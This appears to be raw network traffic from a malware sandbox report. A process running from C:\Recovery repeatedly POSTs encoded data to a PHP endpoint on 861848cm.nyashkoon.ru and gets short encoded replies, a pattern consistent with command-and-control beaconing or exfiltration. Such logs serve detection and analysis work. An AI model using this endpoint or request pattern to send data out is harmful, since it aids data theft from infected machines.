                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:04.079330921 CET1012OUTData Raw: 56 54 5f 5e 56 5c 50 5c 5a 5f 52 51 54 5e 5b 5a 55 52 59 5f 51 54 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VT_^V\P\Z_RQT^[ZURY_QTRRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%-?6W?^;+3Y(:2)[!0;#/>T<. -%] $21'X$.Q-6
                                                                    Nov 6, 2024 03:38:04.534209013 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:04.602958918 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    51192.168.2.44980937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:03.851068974 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:04.203969955 CET1252OUTData Raw: 53 55 5a 5b 53 5a 55 59 5a 5f 52 51 54 58 5b 59 55 54 59 58 51 5e 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SUZ[SZUYZ_RQTX[YUTYXQ^R\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%X-,==(<U$>1)5%8, W+#.6,X77'9'X$.Q-.


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    52192.168.2.44981537.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:04.782592058 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:05.141393900 CET1012OUTData Raw: 56 52 5f 59 56 59 50 5b 5a 5f 52 51 54 53 5b 5b 55 57 59 59 51 51 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VR_YVYP[Z_RQTS[[UWYYQQRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_;Y-<(^+Y*:%^?-3 X#,!(,9%\#4>^19'X$.Q-
                                                                    Nov 6, 2024 03:38:05.594321966 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:05.664218903 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    53192.168.2.44982137.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:06.166851044 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:06.516539097 CET1012OUTData Raw: 56 57 5a 55 56 58 50 5b 5a 5f 52 51 54 53 5b 52 55 53 59 5e 51 5f 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VWZUVXP[Z_RQTS[RUSY^Q_R[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_-?2+;?#(*6)[9$4U+>+].?7>_29'X$.Q-
                                                                    Nov 6, 2024 03:38:06.976986885 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:07.056188107 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    54192.168.2.44982737.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:07.175524950 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:07.532018900 CET1012OUTData Raw: 56 5e 5a 5a 53 5c 50 5a 5a 5f 52 51 54 5d 5b 53 55 53 59 5a 51 52 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V^ZZS\PZZ_RQT][SUSYZQRR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%\8,2=8Y()=>->\3$_#,:+.,6##'"Y19'X$.Q-
                                                                    Nov 6, 2024 03:38:07.986022949 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:08.062239885 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    55192.168.2.44983337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:08.327939987 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:08.673830986 CET1012OUTData Raw: 56 50 5a 58 53 5d 50 59 5a 5f 52 51 54 53 5b 58 55 55 59 5f 51 55 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VPZXS]PYZ_RQTS[XUUY_QURYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&;.T<80X<0\*9![*."\3^ Z ?)>/-]74=')'X$.Q-
                                                                    Nov 6, 2024 03:38:09.152043104 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:09.231482983 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    56192.168.2.44983837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:09.360687971 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    57192.168.2.44984137.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:09.616775990 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:09.969501019 CET1276OUTData Raw: 56 56 5f 5f 53 58 50 5b 5a 5f 52 51 54 5c 5b 53 55 55 59 5f 51 50 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VV__SXP[Z_RQT\[SUUY_QPRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%\;?=<;$\(U X)*!X>=0+(_",.+-7]:&' _'9'X$.Q->
                                                                    Nov 6, 2024 03:38:10.463767052 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:10.538990021 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 5d 3c 5c 36 5b 26 38 3b 0c 29 58 26 00 3c 20 28 03 38 32 3b 02 3d 20 2c 5c 3e 06 0e 16 34 06 2c 00 22 32 21 11 34 0c 3b 12 3c 2b 21 5f 05 1d 3a 06 27 29 27 08 2a 1c 26 14 29 37 24 41 31 56 3c 43 2a 5d 32 5a 23 3a 0c 55 32 10 2e 01 32 32 33 19 3c 42 3a 04 3a 59 20 09 31 10 2a 57 09 16 20 55 25 23 3b 5a 28 21 3b 5e 24 3e 14 02 26 3a 2f 54 3f 3c 2b 5a 37 24 22 15 29 33 37 5a 36 27 3d 04 33 2a 3e 0a 25 3e 05 51 2b 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: ]<\6[&8;)X&< (82;= ,\>4,"2!4;<+!_:')'*&)7$A1V<C*]2Z#:U2.223<B::Y 1*W U%#;Z(!;^$>&:/T?<+Z7$")37Z6'=3*>%>Q+2&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    58192.168.2.44984237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:09.740973949 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:10.094511032 CET1012OUTData Raw: 56 57 5a 5c 56 5b 55 5e 5a 5f 52 51 54 5e 5b 5e 55 52 59 56 51 57 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VWZ\V[U^Z_RQT^[^URYVQWR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&/)(;$Y?'=*==.Z3##,&T+X -6,44"%'X$.Q-6
                                                                    Nov 6, 2024 03:38:10.555252075 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:10.627149105 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    59192.168.2.44985037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:10.753793955 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:11.112481117 CET1012OUTData Raw: 56 50 5f 5e 53 5f 55 5e 5a 5f 52 51 54 53 5b 5d 55 54 59 58 51 57 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VP_^S_U^Z_RQTS[]UTYXQWR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%;?2S?X+3[)!_>>[$(' ,1+X(.%7%'X$.Q-
                                                                    Nov 6, 2024 03:38:11.564965963 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:11.643349886 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    60192.168.2.44985637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:11.822204113 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:12.173727036 CET1012OUTData Raw: 53 51 5a 58 53 58 50 59 5a 5f 52 51 54 5c 5b 58 55 53 59 58 51 5f 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SQZXSXPYZ_RQT\[XUSYXQ_RXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%X8,)<;7?$)*5X?-6'^#7/.<.?].5,Y4&Y&'X$.Q->
                                                                    Nov 6, 2024 03:38:12.632369995 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:12.700288057 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    61192.168.2.44986337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:12.888912916 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:13.235120058 CET1012OUTData Raw: 53 51 5a 5b 53 5a 55 5a 5a 5f 52 51 54 5c 5b 5c 55 55 59 5b 51 52 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SQZ[SZUZZ_RQT\[\UUY[QRRRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/Y"T(+$]? ;)-Z==63$"<-<.+Z.#$-&'X$.Q->
                                                                    Nov 6, 2024 03:38:13.698288918 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:13.773247957 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    62192.168.2.44986937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:14.130297899 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:14.486221075 CET1012OUTData Raw: 56 50 5f 5e 56 57 50 5f 5a 5f 52 51 54 5f 5b 5d 55 51 59 57 51 53 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VP_^VWP_Z_RQT_[]UQYWQSRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%-/W?+?#0Z>92)="\3,4?9<>,-%3#'9'X$.Q-2
                                                                    Nov 6, 2024 03:38:14.951869011 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:15.031677008 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    63192.168.2.44987537.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:15.240705967 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    64192.168.2.44987937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:15.555893898 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:15.907191992 CET1276OUTData Raw: 56 53 5a 5c 53 5c 50 59 5a 5f 52 51 54 58 5b 5a 55 57 59 56 51 53 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VSZ\S\PYZ_RQTX[ZUWYVQSR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%_-/1<^8(<()-Y>>*Z$;?#/P('-3!'%'X$.Q-.
                                                                    Nov 6, 2024 03:38:16.377175093 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:16.447371960 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 1a 2b 39 2e 13 26 2b 37 0b 28 3e 39 58 28 30 27 19 2c 0c 2c 5f 3d 33 2b 00 2b 3b 27 0d 34 11 33 5d 22 21 2a 01 20 0b 38 01 3c 01 21 5f 05 1d 3a 02 24 2a 3f 09 2a 0b 25 04 29 19 34 46 31 09 3f 1a 2a 2b 29 04 34 03 25 0f 26 10 31 58 31 0b 2c 0a 3f 34 08 06 2d 3f 20 0d 31 3a 2a 57 09 16 20 1f 30 23 3b 5a 2a 0f 0d 5f 24 3e 21 5a 24 39 2c 0a 3d 5a 2f 59 20 0a 29 07 3d 1d 09 13 22 19 2d 00 27 5c 31 19 25 2e 23 56 28 32 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: +9.&+7(>9X(0',,_=3++;'43]"!* 8<!_:$*?*%)4F1?*+)4%&1X1,?4-? 1:*W 0#;Z*_$>!Z$9,=Z/Y )="-'\1%.#V(2&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    65192.168.2.44988237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:15.679666996 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
